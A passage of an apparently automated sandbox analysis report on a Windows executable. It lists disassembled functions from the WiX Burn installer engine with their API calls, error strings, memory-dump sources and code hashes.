                                                                                                                                                                  • String ID: Failed to get visibility of variable: %ls$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 3168844106-1405185440
                                                                                                                                                                  • Opcode ID: 6776199fc0658c7a8ccc454311cf9fb79433fe50398eb4f15760000cd3ec9c3c
                                                                                                                                                                  • Instruction ID: 3004acc93012c8b3c364ebb537b6b1b83803457f8c3bc0f5b83d1e88396ecc7f
                                                                                                                                                                  • Opcode Fuzzy Hash: 6776199fc0658c7a8ccc454311cf9fb79433fe50398eb4f15760000cd3ec9c3c
                                                                                                                                                                  • Instruction Fuzzy Hash: FC018F7264021CFFDB029F44CC0AFDE3BAAEB08765F018050F9159B260D770AE909BA0
                                                                                                                                                                  Function 00968CE7 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000), ref: 00968CFE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?,?,?,00966F4A,00000000), ref: 00968D0A
                                                                                                                                                                    • Part of subcall function 00968CD0: CloseHandle.KERNEL32(FFFFFFFE,00968D1A,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?,?), ref: 00968CE0
                                                                                                                                                                  • ___initconout.LIBCMT ref: 00968D1A
                                                                                                                                                                    • Part of subcall function 00968C91: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00968CC0,00967E3D,?,?,009669A7,?,00000000,00000000,?), ref: 00968CA4
                                                                                                                                                                  • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,00967E50,00000000,00000001,?,?,?,009669A7,?,00000000,00000000,?), ref: 00968D2F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2744216297-0
                                                                                                                                                                  • Opcode ID: e73e45e20338e5aae389872a64fabcdcc197db53577335df21e3dc2f2123f132
                                                                                                                                                                  • Instruction ID: 9deb788b09801cc35a372b57230c17d64ebe714b84301031f25ca3e3af9ff302
                                                                                                                                                                  • Opcode Fuzzy Hash: e73e45e20338e5aae389872a64fabcdcc197db53577335df21e3dc2f2123f132
                                                                                                                                                                  • Instruction Fuzzy Hash: 20F03037015114BBCF226F95DC09A8A3F6AFF4A7A1F004551FE5C95170DB32C960EBA0
                                                                                                                                                                  Function 009169E0 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 009169E9
                                                                                                                                                                  • SetEvent.KERNEL32(?,?,?,00000000), ref: 00916A06
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00916A10
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 00916A17
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterErrorEventLastLeave
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2851136515-0
                                                                                                                                                                  • Opcode ID: 873dd6729b1dfd297c9ee12384f15687927d09406fce847d73184cc85a135285
                                                                                                                                                                  • Instruction ID: 4349019a8bbae667190b99ebe703e368bd84acb6622ed6ef6dbc5beee177c964
                                                                                                                                                                  • Opcode Fuzzy Hash: 873dd6729b1dfd297c9ee12384f15687927d09406fce847d73184cc85a135285
                                                                                                                                                                  • Instruction Fuzzy Hash: 08E09237314519A7CB116FA5EC08ECA7BBCEF8D761B008021F619D2131DB30E585DBA0
                                                                                                                                                                  Function 0095A616 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EncodePointer.KERNEL32(00000000,?), ref: 0095A63B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EncodePointer
                                                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                                                  • API String ID: 2118026453-2084237596
                                                                                                                                                                  • Opcode ID: 7e53eee64a25c284ed01050533e71d7852a0c364bbbf997d91fb4113c4354345
                                                                                                                                                                  • Instruction ID: 5351f3d3b4f1ec90ccb1ea60630fe785fc05d9d7fa3639c34edac6cd68970bd2
                                                                                                                                                                  • Opcode Fuzzy Hash: 7e53eee64a25c284ed01050533e71d7852a0c364bbbf997d91fb4113c4354345
                                                                                                                                                                  • Instruction Fuzzy Hash: D9417831900209EFCF15DF99CC81AAEBBB9BF48305F198298FD0467221D335A954DB56
                                                                                                                                                                  Function 0093D8F2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to copy variant value., xrefs: 0093D988
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variant.cpp, xrefs: 0093D99A
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memcpy_s
                                                                                                                                                                  • String ID: Failed to copy variant value.$d:\a\wix4\wix4\src\burn\engine\variant.cpp
                                                                                                                                                                  • API String ID: 2001391462-3907457943
                                                                                                                                                                  • Opcode ID: c4b3ecbc6b96df6c8beda29722a7fdae79278bb4d9f0a741c5a7214c9c27a02e
                                                                                                                                                                  • Instruction ID: f9fd99734b52fdba4ea54e88552bece7bdb21739de3083cc9a064bc3cc8628c9
                                                                                                                                                                  • Opcode Fuzzy Hash: c4b3ecbc6b96df6c8beda29722a7fdae79278bb4d9f0a741c5a7214c9c27a02e
                                                                                                                                                                  • Instruction Fuzzy Hash: 4F212972D03219BAD721EEACECA5FBEF66CEB46710F140926F510A7140D2749D40CEA2
                                                                                                                                                                  Function 009480DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 85COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • CompareStringW.KERNEL32(00000000,00000000,00000000,000000FF,?,000000FF,00916DEA,00000000,00917162,00000000,00000257,54B7FF10), ref: 00948132
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add chained patch., xrefs: 00948176
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\mspengine.cpp, xrefs: 00948188
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString
                                                                                                                                                                  • String ID: Failed to add chained patch.$d:\a\wix4\wix4\src\burn\engine\mspengine.cpp
                                                                                                                                                                  • API String ID: 1825529933-1868150798
                                                                                                                                                                  • Opcode ID: c890666f29cf680bf632d62f97995bc898e0397198de474d0067c1cc7fc6aa24
                                                                                                                                                                  • Instruction ID: a50064646b49984afa78b8622b8689b11340a25ef4de0a07c12093e95a7168e5
                                                                                                                                                                  • Opcode Fuzzy Hash: c890666f29cf680bf632d62f97995bc898e0397198de474d0067c1cc7fc6aa24
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F317F71A04219EFDB04CF58CC85EEEB7B9FF49314F20865AE914A7391D770A941DB90
                                                                                                                                                                  Function 00915600 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 79COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp, xrefs: 00915641
                                                                                                                                                                  • Failed to resize array while inserting items, xrefs: 00915632
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to resize array while inserting items$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\memutil.cpp
                                                                                                                                                                  • API String ID: 0-1811546269
                                                                                                                                                                  • Opcode ID: 4359c97938f14a7ab299a9dbeb8770dca7cb3900e2f5e0c8b84911aab7d47041
                                                                                                                                                                  • Instruction ID: b933e772514bf4f0ab9344ae7c299dbbf2360c8d60baa9f533daabed5a73a1ac
                                                                                                                                                                  • Opcode Fuzzy Hash: 4359c97938f14a7ab299a9dbeb8770dca7cb3900e2f5e0c8b84911aab7d47041
                                                                                                                                                                  • Instruction Fuzzy Hash: 7821A171B00619EFCF04EE58CD86EEFBB69EFD4754F564025E805AB351D270A9408BE0
                                                                                                                                                                  Function 009771E2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 0096CBC2: RegOpenKeyExW.KERNELBASE(?,0096CBBE,00000000,00000000,00000003,00000000,?,?,00976603,80000002,00000000,00020019,00000000,00000000,SOFTWARE\Policies\,00000000), ref: 0096CBED
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00916E9A,?,00020019,?,00000000,00000000,00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall,00020019,?,?), ref: 0097728C
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp, xrefs: 0097722E
                                                                                                                                                                  • Failed to open uninstall key for potential related bundle: %ls, xrefs: 0097721F
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseOpen
                                                                                                                                                                  • String ID: Failed to open uninstall key for potential related bundle: %ls$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\butil.cpp
                                                                                                                                                                  • API String ID: 47109696-3466351475
                                                                                                                                                                  • Opcode ID: c4c1e09b0e53e10759582513a87f7ef5515defcc98a7c66ac59d6dfdfdd3d392
                                                                                                                                                                  • Instruction ID: ecedc3f16f7119b32a8d7b4531959f667b4675d5599b9f76ae3373252060f1ab
                                                                                                                                                                  • Opcode Fuzzy Hash: c4c1e09b0e53e10759582513a87f7ef5515defcc98a7c66ac59d6dfdfdd3d392
                                                                                                                                                                  • Instruction Fuzzy Hash: 78217C76A00609BFDB01DFA8C845A9EBBF9EF88314F108465FA69E3251D7709E009B91
                                                                                                                                                                  Function 0096C51F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(?,?,0096C4F6,00020006,?,?,00000000,00000000,00000000,00927B5F,00000000,00000000,?,00927B5F,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce), ref: 0096C55C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Create
                                                                                                                                                                  • String ID: Failed to create registry key.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 2289755597-627842214
                                                                                                                                                                  • Opcode ID: e75c5e84fcfe74234eba36ab0fac951ce01f0511d8c5747635c5347f4c0f1347
                                                                                                                                                                  • Instruction ID: 46d3b69e2500d95ade64de2fc8ba3301985b3c1bf4a954bf312fd60865a39fa6
                                                                                                                                                                  • Opcode Fuzzy Hash: e75c5e84fcfe74234eba36ab0fac951ce01f0511d8c5747635c5347f4c0f1347
                                                                                                                                                                  • Instruction Fuzzy Hash: B81108B6604219BBDB109F129D09EEF3EADDFC6750F050029BE06D7260EA31DD11D6B0
                                                                                                                                                                  Function 009783E3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56fileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 009739DD: SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739F5
                                                                                                                                                                    • Part of subcall function 009739DD: GetLastError.KERNEL32(?,?,?,0092CE21,?,00000000,00000000,00000000,00000000), ref: 009739FF
                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,00000008,00000008,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,?,?,?,0097850C), ref: 00978447
                                                                                                                                                                  Strings
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp, xrefs: 00978425
                                                                                                                                                                  • Failed to seek to start point in file., xrefs: 00978416
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: File$ErrorLastPointerWrite
                                                                                                                                                                  • String ID: Failed to seek to start point in file.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\dlutil.cpp
                                                                                                                                                                  • API String ID: 972348794-4104125422
                                                                                                                                                                  • Opcode ID: ccc2b8c95737cf8b72588e356e32cdfe598c002bfc0da48c80943cbaa18ad773
                                                                                                                                                                  • Instruction ID: a8612796c2794ea3361e8dff1f38f9b84b7fcdcbc5160e2e3fc318f603a9fc80
                                                                                                                                                                  • Opcode Fuzzy Hash: ccc2b8c95737cf8b72588e356e32cdfe598c002bfc0da48c80943cbaa18ad773
                                                                                                                                                                  • Instruction Fuzzy Hash: D401C87265021ABBD7148B58DC4AFAF776CEB00764F10822AB914D61D0D7F09E50C6A0
                                                                                                                                                                  Function 0096C83F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 55registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,0096D6D1,00000000,00916EDE,00000000,00000000,00000000,00000000,00020019,00000000,00000000,00000000,?,?,?,0092713E), ref: 0096C860
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: QueryValue
                                                                                                                                                                  • String ID: Failed to read registry value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3660427363-2776790363
                                                                                                                                                                  • Opcode ID: 83c665efab47ecf2c78bfd12f9a2b206de7b1980f14009d20e613ed977afcd5a
                                                                                                                                                                  • Instruction ID: 538b7522ffb94b65346c3fee4f5175bfc9b52793cabaa64acd91c4fd1a41d0c3
                                                                                                                                                                  • Opcode Fuzzy Hash: 83c665efab47ecf2c78bfd12f9a2b206de7b1980f14009d20e613ed977afcd5a
                                                                                                                                                                  • Instruction Fuzzy Hash: 3101D6B6B4011577D730191A5C49FBF6A9ECBC6B70F15402ABA49EB350E975CC0283F0
                                                                                                                                                                  Function 0096D719 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegSetValueExW.ADVAPI32(?,00928FA9,?,00000000,?,?,?,?), ref: 0096D738
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value
                                                                                                                                                                  • String ID: Failed to set %ls value.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\regutil.cpp
                                                                                                                                                                  • API String ID: 3702945584-457337809
                                                                                                                                                                  • Opcode ID: eecbfa9071b7bf93507458f0d7dffa386738fd95c60042bfece5f3824e0aba4f
                                                                                                                                                                  • Instruction ID: 5e89f76e33d75acef88bfe7d3c20fb3d2365a342122ff3ab1560bb354371a701
                                                                                                                                                                  • Opcode Fuzzy Hash: eecbfa9071b7bf93507458f0d7dffa386738fd95c60042bfece5f3824e0aba4f
                                                                                                                                                                  • Instruction Fuzzy Hash: 98F0F07B70126877E7212A1B5C08E9F3E6DDBC6B60F050029BF289B250EA318D02D2F1
                                                                                                                                                                  Function 00919960 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 0091997C
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set variant value., xrefs: 009199AE
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 009199C0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoNativeSystem
                                                                                                                                                                  • String ID: Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                  • API String ID: 1721193555-2731189036
                                                                                                                                                                  • Opcode ID: 8f7e76c2d1fc47c4640def6ec927303939e244b476d285bd37eb5b77a6cfee14
                                                                                                                                                                  • Instruction ID: b588c763e177a607eba3069268da217308617de990468677a37e51ec6e2b44ed
                                                                                                                                                                  • Opcode Fuzzy Hash: 8f7e76c2d1fc47c4640def6ec927303939e244b476d285bd37eb5b77a6cfee14
                                                                                                                                                                  • Instruction Fuzzy Hash: 61F0F972E0161C7ADF01EB98DC0AEDEBBB9AB44714F004825F614FA190E3B09944CB91
                                                                                                                                                                  Function 0093D2EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00912B25: FormatMessageW.KERNEL32(-000011F7,00000008,?,00000000,00000000,00000000,00000000,80070656,?,?,?,0093D303,00000000,00000008,00000000,80070656), ref: 00912B56
                                                                                                                                                                    • Part of subcall function 00912B25: GetLastError.KERNEL32(?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001,00000000,80070656,00000000,?), ref: 00912B63
                                                                                                                                                                    • Part of subcall function 00912B25: LocalFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0093D303,00000000,00000008,00000000,80070656,?,?,0092A7BB,00000001), ref: 00912BE7
                                                                                                                                                                  • MessageBoxW.USER32(00000000,00000000,?,00001010), ref: 0093D349
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to allocate string to display error message, xrefs: 0093D30C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\splashscreen.cpp, xrefs: 0093D31B
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
